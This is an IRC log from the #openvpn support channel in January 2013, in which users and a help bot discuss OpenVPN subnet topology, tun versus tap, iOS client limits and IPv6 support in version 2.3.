20:04 < AlbinoGeek> I've finished CentOS 5 for client and server, now writing Windows 7 client/server docs.
20:04 < EugeneKay> !windows
20:04 <@vpnHelper> "windows" is (#1) computers are like air conditioners, they work well until you open windows. or (#2) http://secure-computing.net/files/windows.jpg for funny or (#3) http://secure-computing.net/files/windows_2.jpg for more funny
20:05 < AlbinoGeek> Both jpg links are dead.
20:05 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
20:05 * EugeneKay smacks ecrist
20:05 < AlbinoGeek> Needs more funny
20:06 -!- cyberspace- [20253@ninthfloor.org] has quit [Quit: leaving]
20:06 < AlbinoGeek> Interesting, 64bit OpenVPN windows does not run on Windows 7 64bit Enterprise
20:06 < AlbinoGeek> :/
20:06 < AlbinoGeek> Architecture mismatch error.
20:06 < EugeneKay> There's a x64 build nowadays?
20:06 < EugeneKay> WOwza
20:06 < AlbinoGeek> Ehh, the 32bit works fine.
20:07 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
20:08 < AlbinoGeek> EugeneKay: And what were you talking about /30 earlier? I didn't do your topology thing (never got around to it) and my clients are being named sanely
20:08 < AlbinoGeek> .10 .11 .12 .13 so far.
20:08 < EugeneKay> o.O
20:08 < EugeneKay> !/30
20:08 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
20:08 < EugeneKay> AFAIK they didn't change the default in 2.3
20:08 < EugeneKay> But I haven't used it, so.
20:08 < AlbinoGeek> I don't think they have.
20:09 < AlbinoGeek> Mind you some machines have ipv4 disabled, not entirely sure why they are still being assigned an ipv4 address.
20:09 < AlbinoGeek> Nevermind, ipv4 disabled on the physical NIC, not the virtual tuns.
20:09 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit []
20:10 <+rob0> Hmmm. "OpenVPN seems to have scared off many of its prospective users," well no, I have not seen evidence of that; "by being so cryptic in its setup instructions." No, this is not so. The HOWTO and manual and mini-howto docs are excellent.
20:12 < AlbinoGeek> rob0: Ehh, when the second step tells you about routed / bridged ; that's enough to scare off most.
20:12 <+rob0> It simply means you need to learn more about basic networking before you step into advanced networking.
20:56 -!- p47 [~Marcos1@189.232.114.214] has joined #openvpn
21:01 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn
21:01 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit []
21:05 -!- p47 [~Marcos1@189.232.114.214] has quit [Quit: Saliendo]
21:34 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 260 seconds]
21:34 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
22:00 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn
22:07 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Ping timeout: 252 seconds]
22:13 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn
23:17 -!- brute11k1 [~brute11k@89.249.230.101] has quit [Quit: Leaving.]
23:23 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
23:24 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Ping timeout: 256 seconds]
23:29 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
23:30 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Excess Flood]
23:31 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
23:34 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn
23:34 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 248 seconds]
23:35 <@novaflash> rob0; i had a guy asking me to teamviewer with him - 10 times before i kicked him - to set up a vpn server for him... but the guy didn't even know what a subdomain was.
23:55 -!- zeeshoem is now known as mnathani
--- Day changed Sat Jan 19 2013
00:43 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
00:45 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
01:28 -!- djc [~djc@gentoo/developer/djc] has joined #openvpn
01:28 < djc> do people here know about the iOS app, or should I send email?
01:28 < djc> my route-gateway stuff doesn't seem to work on my iPad
01:29 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit []
01:29 < djc> i.e. 'push "route 10.33.3.0 255.255.255.0"' on the server
01:30 < djc> but when I try to go to 10.33.3.12 in the browser, it can't find it
01:46 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has left #openvpn []
01:53 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has joined #openvpn
01:54 -!- mattock is now known as mattock_afk
01:59 < AlbinoGeek> !layer2
01:59 <@vpnHelper> "layer2" is (#1) you are using tap, what specific layer2 protocol do you need to work over the vpn?
or (#2) Bridging looks like a good choice to people who don't know how to set up IP routing, but to learn routing is generally far better or (#3) protocols that use layer2 communicate by MAC address, not IP address
02:00 < djc> well, I'm not using tap, and I know a bit of routing
02:00 < djc> so that's not very helpful
02:10 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds]
02:21 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Ping timeout: 245 seconds]
02:38 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn
02:52 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 245 seconds]
02:56 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn
03:03 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn
03:15 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has quit [Ping timeout: 276 seconds]
03:26 < AlbinoGeek> djc: Sorry, I was trying to find something myself.
03:26 -!- novaflash_away [~novaflash@vpnserver1.jellemaautomatisering.nl] has joined #openvpn
03:26 -!- novaflash_away is now known as novaflash
03:32 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has quit [Changing host]
03:32 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn
03:32 -!- mode/#openvpn [+o novaflash] by ChanServ
03:38 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
03:38 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
03:38 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
03:38 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
03:38 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
03:47 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 240 seconds]
04:07 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
04:07 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
04:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
04:08 -!- dydzEz2 [dydzEz2@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
04:11 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.]
04:17 < EugeneKay> djc - not a clue about iOS. Sorry.
04:55 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Ping timeout: 245 seconds]
05:28 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
05:28 -!- mode/#openvpn [+v s7r] by ChanServ
05:39 -!- eutheria [~euther0a@cpc2-cmbg15-2-0-cust990.5-4.cable.virginmedia.com] has joined #openvpn
05:43 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
05:44 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
05:49 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
05:51 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
05:53 -!- havoc [~havoc@neptune.chaillet.net] has quit [Ping timeout: 255 seconds]
06:04 -!- Thermi_ [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Quit: ZNC - http://znc.in]
06:10 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn
06:37 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn
06:48 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has joined #openvpn
07:00 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has quit [Remote host closed the connection]
07:05 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 255 seconds]
07:05 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has joined #openvpn
07:05 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
07:10 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer]
07:16 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has left #openvpn []
07:17 < Freeaqingme> With 2.2, can I use a tunnel (tun, no tap) that is set up over ipv4, and which tunnels ipv6 traffic?
07:19 < Wulf> Freeaqingme: probably
07:20 < Wulf> I never tried but I'd be really surprised if it does not work
07:20 < Freeaqingme> well, there's this: http://openvpn.net/index.php/open-source/faq/77-server/287-is-ipv6-support-plannedin-the-works.html
07:20 <@vpnHelper> Title: Is IPv6 support planned/in the works? (at openvpn.net)
07:21 < Freeaqingme> so if it is supported, it is really recent. But I'm not sure if the article implies that the limitations apply to <2.2rc2, or that they also apply to 2.2
07:21 < Wulf> oh.
07:22 < Wulf> then go and use 2.3; it was released not long ago
07:22 < Freeaqingme> I'm seeing that just now! if I can find an ubuntu package..
07:23 < Wulf> make your own
07:24 < Freeaqingme> Wulf, got it ;) http://repos.openvpn.net/repos/apt/conf/repos.openvpn.net-precise-snapshots.txt
07:26 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn
07:33 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 256 seconds]
07:39 -!- nucleo [nucleo@fedora/nucleo] has joined #openvpn
07:40 -!- havoc [~havoc@neptune.chaillet.net] has joined #openvpn
08:37 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn
08:38 < plaisthos> Freeaqingme: no, 2.2 does not do that
08:38 < plaisthos> Freeaqingme: the ubuntu packages include the ipv6 patches
08:38 < plaisthos> so it should work as well
08:51 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 244 seconds]
09:03 -!- JackWinter2 [~jack@vodsl-4655.vo.lu] has joined #openvpn
09:04 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn
09:08 -!- JackWinter2 [~jack@vodsl-4655.vo.lu] has quit [Client Quit]
09:22 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn
09:22 < Qianyi> hi
09:22 < Qianyi> can't visit openvpn.net, could anyone please provide another link to download the newest beta for windows of openvpn?
09:22 < Qianyi> :)
09:34 -!- mattock_afk is now known as mattock
09:39 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn
09:40 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 256 seconds]
09:42 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
10:00 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
10:00 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Client Quit]
10:04 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Read error: Connection reset by peer]
10:04 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn
10:07 <+rob0> beta? There is no beta at this time. 2.3 is the current release.
10:07 -!- eutheria [~euther0a@cpc2-cmbg15-2-0-cust990.5-4.cable.virginmedia.com] has quit [Remote host closed the connection]
10:09 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
10:18 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"]
10:18 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Quit: Leaving]
10:19 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
10:23 -!- master_of_master [~master_of@p57B53191.dip.t-dialin.net] has quit [Ping timeout: 244 seconds]
10:24 -!- master_of_master [~master_of@p57B53F05.dip.t-dialin.net] has joined #openvpn
10:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 244 seconds]
10:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
10:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
10:43 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer]
10:52 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
10:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
10:55 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
10:56 -!- djc [~djc@gentoo/developer/djc] has left #openvpn []
10:57 < Qianyi> rob0, i mean 2.3 rc2
10:57 < Freeaqingme> Wulf, vpnHelper There's one remark though: Options error: --server-ipv6 settings: only /64../112 supported right now (not /122)
10:57 < Qianyi> would anyone have a mirror or link?
10:58 <+rob0> Qianyi, you should use the final release version, not rc2.
10:59 <+rob0> sorry, I do not know of alternate download sites, if Google can't find them.
11:00 < Qianyi> np thanks
11:03 -!- b1rkh0ff [~b1rkh0ff@178.77.1.28] has joined #openvpn
11:19 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Ping timeout: 244 seconds]
11:25 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in]
11:26 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
11:29 < Freeaqingme> Is there any obvious reason ifconfig-ipv6-pool only supports /64 pools?
11:33 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
11:41 -!- nucl3ar [~atom@c-69-247-138-234.hsd1.tn.comcast.net] has joined #openvpn
11:42 < nucl3ar> !welcome
11:42 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
11:42 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
11:45 < nucl3ar> anybody familiar with issues concerning openvpn killing bandwidth *after* it's shut down?
11:48 < nucl3ar> example: (#1) speed test using wget avg roughly 2.5-3 mb/s without openvpn (#2) connect through openvpn, use wget again, roughly 1.0 mb/s (#3) kill openvpn (ctrl+c), run wget speedtest for the last time.. this time 70 kb/s (dies intermittently).
11:50 -!- Martin` [martin@2001:16f8:2:10::215] has joined #openvpn
11:50 < Martin`> Hello world!
12:04 < Martin`> When I want to connect my ipad to openvpn, do I have to change my server config? my server is configured with tap devices (I bridged the devices). I see the ios client does not support tap. is this a problem? or can the client be tun, and the server tap?
12:04 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection]
12:07 < dioz> interesting
12:08 < dioz> there is ios support now
12:09 < dioz> check the apple store
12:09 < dioz> !ios
12:09 < dioz> !apple
12:09 < dioz> lemme scroll back a second
12:09 < Martin`> I know, downloaded the app, but I read there is no tap support in ios
12:09 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Remote host closed the connection]
12:10 < dioz> oooh i see what you're saying
12:13 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 245 seconds]
12:27 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn
12:35 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Read error: Connection reset by peer]
12:42 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
12:44 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
12:47 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
12:51 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
12:52 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
12:53 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
12:53 -!- _br_- is now known as _br_
12:58 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:01 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:03 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:05 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:08 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:11 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:13 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:14 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:18 -!- Valcorb [~Valcorb@74.115.1.243] has joined #openvpn
13:19 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:20 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:24 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:28 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:29 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:31 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:35 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:38 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:40 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:41 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:45 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:47 -!- Valcorb [~Valcorb@74.115.1.243] has quit [Ping timeout: 246 seconds]
13:47 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:50 -!- p47 [~Marcos1@189.144.65.247] has joined #openvpn
13:50 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:50 < p47> When I connect to the vpn I can access my server but my computer just gets disconnected from the internet. any idea?
13:54 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has quit [Read error: Connection reset by peer]
13:55 -!- Castor__ [~hi@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn
13:55 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:56 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:58 -!- Castor__ [~hi@CPE-72-133-200-232.wi.res.rr.com] has quit [Read error: Connection reset by peer]
13:58 -!- Castor_ [~hi@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn
13:58 -!- p47 [~Marcos1@189.144.65.247] has quit [Quit: Leaving]
13:59 -!- p47 [~Marcos1@189.144.65.247] has joined #openvpn
14:00 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:01 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:01 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Leaving]
14:03 -!- p47 [~Marcos1@189.144.65.247] has quit [Client Quit]
14:03 -!- p47 [~Marcos1@189.144.65.247] has joined #openvpn
14:03 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:06 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Ping timeout: 248 seconds]
14:06 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:09 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:10 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
14:11 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:12 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:13 -!- Porkepix [~Porkepix@lns-bzn-45-82-65-137-188.adsl.proxad.net] has joined #openvpn
14:15 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Read error: Connection reset by peer]
14:16 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!]
14:16 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn
14:17 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:19 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:22 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:22 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
14:23 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 256 seconds]
14:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:27 -!- Castor_ [~hi@CPE-72-133-200-232.wi.res.rr.com] has quit [Read error: Connection reset by peer]
14:27 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:28 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn
14:30 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:32 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
14:32 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:34 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:38 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:39 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:41 < Martin`> p47: do you want to have internet via vpn?
14:42 <+pekster> Sounds to me like a case of redirect-gateway being pushed but not functioning (maybe the server doesn't forward the traffic properly?)
14:43 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:44 < p47> Martin`, solved
14:44 < p47> thank you
14:45 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:47 < Martin`> you're welcome
14:47 < Martin`> now I'm going to solve my problems
14:47 < Martin`> want to connect an ios device. but need a tun instead of tap for that
14:47 < p47> Martin`, LOL
14:47 <+pekster> Why use tap in the first place?
14:47 < Martin`> guess routing is the only way :(
14:47 <+pekster> !tunortap
14:47 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Don't waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
14:47 <@vpnHelper> over the vpn or (#4) lan gaming? use tap!
14:48 < p47> Martin`, I would like to help you but I can not, I'm a noob
14:48 < Martin`> hmm
14:48 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:48 < EugeneKay> Martin`, you can use a tap device in routed mode just fine.
14:49 < Martin`> pekster: I run the vpn on different ports. over http proxy needed on port 442
14:49 < Martin`> 443
14:49 < Martin`> so I bridge multiple vpn's
14:49 < Martin`> port 443 with redirect gateway
14:49 <+pekster> Oh. I just use separate ranges and route them internally when I need to do that
14:50 <+pekster> eg: if you have 10.8.0.0/24 as your VPN range, give 1 VPN 10.8.0.0/25 and another 10.8.0.128/25, and connect them together in the server/firewall if you want clients to talk to each other
14:50 < Martin`> I believe you can not bridge a tun
14:50 <+pekster> I'm talking about routing them, not bridging them
14:50 <+pekster> Notice how I split the /24 into two /25's
14:50 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:50 < Martin`> ok
14:50 <+pekster> I mean, you can bridge 2 taps like you're doing too, but if the only reason is to "connect" both VPNs, I think it's a bad solution
14:51 < EugeneKay> Bridging bridges is not a sound structural decision
14:52 < Martin`> ok, but I'm not changing the setup right now, so I add one with tun I guess :P
14:52 <+pekster> You can always make the 2nd one a tun/routed configuration later when you can handle the downtime/setup-time
14:52 < Martin`> setup time is the big issue :P
14:53 <+pekster> As long as the server has ip-forwarding enabled and the firewall permits it, you can have as many VPNs communicating with other VPNs as you want
14:53 < Martin`> need to config multiple things
14:53 < Martin`> the server has its own public ip so not a problem
14:53 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
14:54 <+pekster> With NAT/port-forwarding, it doesn't really matter. My home VPN server (currently running 3 VPNs, and soon to be a couple more) works fine behind my NAT box
14:55 < Martin`> :)
14:55 <+pekster> OpenVPN is very "NAT-friendly" since all traffic goes over a single port
14:55 < Martin`> that's why I like it :)
14:56 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
14:58 -!- p47 [~Marcos1@189.144.65.247] has quit [Quit: Leaving]
14:59 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:02 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:04 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:05 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:08 < Martin`> pekster: but it is always better to get tun and routing?
15:08 <+pekster> Martin`: Unless you need tap (as the bot's output told you earlier) yes
15:09 <+pekster> If you're not doing weird stuff like multicast broadcasts or Ethernet broadcast protocols, you don't need tap for your setup
15:09 <+pekster> If you don't know what any of that is, you don't need tap
15:09 < Freeaqingme> or ipv6 with a subnet smaller than /112
15:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:09 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has quit [Read error: Connection reset by peer]
15:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:09 <+pekster> Any ISP giving you less than a /64 needs to be shot
15:10 < Martin`> I can use a /48
15:10 < Freeaqingme> pekster, for a mere vps?
15:10 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn
15:10 < Martin`> that is the next step I wanna do. add ipv6 support
15:10 < Martin`> not sure if my openvpn version does support it
15:10 <+pekster> Freeaqingme: Sure, why not. IPv6 space is huge. Maybe a customer has to officially "request" it, but there's no reason to fail to give customers at the very least a /64 if they're paying for IPv6 access
15:10 < Freeaqingme> Martin`, 2.3.0 supports anything up to /112, although it's easiest with a /64
15:12 < Freeaqingme> pekster, true
15:12 < Martin`> OpenVPN 2.1.0 x86_64-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Jul 20 2010
15:12 < Martin`> really need to upgrade
15:12 <+pekster> The recommendation for ISPs is to give residential customers at *least* a /64, and a /56 is suggested
15:13 < Martin`> I hope my home isp will give me a /64
15:13 <+pekster> If a hosting provider can't do that for a paying customer, I'd shop elsewhere
15:13 < Martin`> true, a /48 was not expensive for me
15:13 < Freeaqingme> pekster, I know. My default isp gives out 1 /48 per connection. But in case of a single machine (not a network, normally), a /112 is pretty big normally
15:14 <+pekster> Even a /56, that gives you 2^8, or 256 possible /64's. I can't imagine a home user needing more than that
15:14 < Martin`> I give every customer of mine a /64
15:14 < Martin`> (vps)
15:14 < Martin`> and they can add ip's of the range to their VPSes
15:14 <+pekster> Yea. That's 65536 /64's. Subtract a few-dozen for whatever backend stuff you need if you're large, and that's still a lot of customers you can support
15:15 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:15 <+pekster> If you have more customers than that, you need a larger allocation and can easily justify it to upstream
15:15 < Martin`> I'm only a little bit sad that they configured ipv6 as a full /48 subnet
15:15 -!- b1rkh0ff [~b1rkh0ff@178.77.1.28] has quit [Quit: Leaving]
15:15 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has quit [Ping timeout: 252 seconds]
